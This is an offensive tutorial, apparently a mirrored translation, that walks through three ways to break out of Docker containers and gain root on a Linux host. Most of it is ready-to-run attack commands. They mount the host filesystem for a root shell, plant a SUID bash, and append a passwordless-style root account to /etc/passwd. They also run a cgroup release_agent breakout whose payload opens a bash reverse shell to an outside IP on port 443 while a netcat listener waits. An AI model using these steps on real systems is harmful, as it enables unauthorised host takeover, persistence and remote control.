How to Break Out of Docker Containers and Gain Root Access on Linux

Navigation

0 前言

1 什么是 Docker ?

2 寻找 Docker 权限

2.1 升级 Shell 到完整 TTY

2.2 手动枚举 Docker 组中的用户

2.3 手动枚举 Docker 服务

2.4 手动枚举 Docker 镜像和默认用户

2.5 工具枚举 Docker – LinPEAS

3 场景1：通过滥用 Docker 组权限提权

4 场景2：直接在特权容器中立足

5 场景3：直接在非特权容器中立足

0. Introduction

In this article we explore Docker breakout techniques to gain root privileges on a target Linux host, covering three different exploitation scenarios.

1. What is Docker?

Docker is an open platform for developing, publishing and running applications in isolated containers. Containers run as root by default, and the Docker daemon ( dockerd ) also runs as root. The docker run command is the most interesting for attackers because it lets them start a container.

Containers are lightweight and contain everything needed to run an application.

2. Enumerating Docker Privileges

Assume we have a foothold as a regular user dawker on the target host.

2.1 Upgrade Shell to Full TTY

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL + Z
stty raw -echo; fg
export TERM=xterm

Having a full TTY allows command history, tab completion, and terminal clearing, which are useful for exploitation.

2.2 Manually Enumerate Users in the Docker Group

whoami ; id

The output shows the current user dawker belongs to the docker group.

2.3 Manually Enumerate Docker Service

find / -name docker.sock 2>/dev/null
ls -l /run/docker.sock

The docker.sock file is writable by the docker group, meaning we can interact with the Docker daemon from the current user.

2.4 Manually Enumerate Docker Images and Default User

docker images
docker run --rm -it alpine sh -c "whoami"

The Alpine image runs as root by default.

2.5 Use LinPEAS for Automated Enumeration

LinPEAS confirms that the current user is in the docker group, the Docker daemon runs as root, and the docker.sock file is writable. It also lists other useful information such as capabilities and security profiles.

3. Scenario 1 – Abuse Docker Group Privileges

Using GTFOBins we find a Docker exploit that mounts the host filesystem and gives a root shell.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

After mounting the host filesystem, create a SUID bash binary to obtain a persistent root shell:

cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

4. Scenario 2 – Directly Inside a Privileged Container

First confirm we are inside a Docker container by checking for .dockerenv and examining /proc/1/cgroup:

cat /proc/1/cgroup

Verify the container is privileged by running fdisk -l and checking the seccomp status; both show values indicating a privileged container.

fdisk -l | grep -A 10 -i "device"
cat /proc/1/status | grep -i "seccomp"

Mount the host filesystem, add a new root user, and SSH into the host:

openssl passwd -1 -salt r00t password123
echo 'r00t:$1$r00t$HZoYdo0F7UZbuKrEXMcah0:0:0:/dev/shm/pwnt:/bin/bash' >> /mnt/juggernaut/etc/passwd
ssh [email protected]

5. Scenario 3 – Break Out of a Non‑Privileged Container

Check that the container is non‑privileged (fdisk fails, seccomp shows 2/1, and /dev contains few entries). Verify that CAP_SYS_ADMIN is enabled and AppArmor is not loaded.

capsh --print
cat /sys/kernel/security/apparmor/profiles

Use the “release_agent breakout 2” technique to gain a root shell on the host:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/breakout" > /tmp/cgrp/release_agent
echo '#!/bin/bash' > /breakout
echo 'bash -i >& /dev/tcp/172.16.1.30/443 0>&1' >> /breakout
chmod a+x /breakout
# attacker: nc -nvlp 443
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

The payload executes and provides a root shell on the host even though the container was not started with --privileged.

All techniques assume the attacker can run commands inside the container and that the Docker daemon is configured with its default (root) privileges.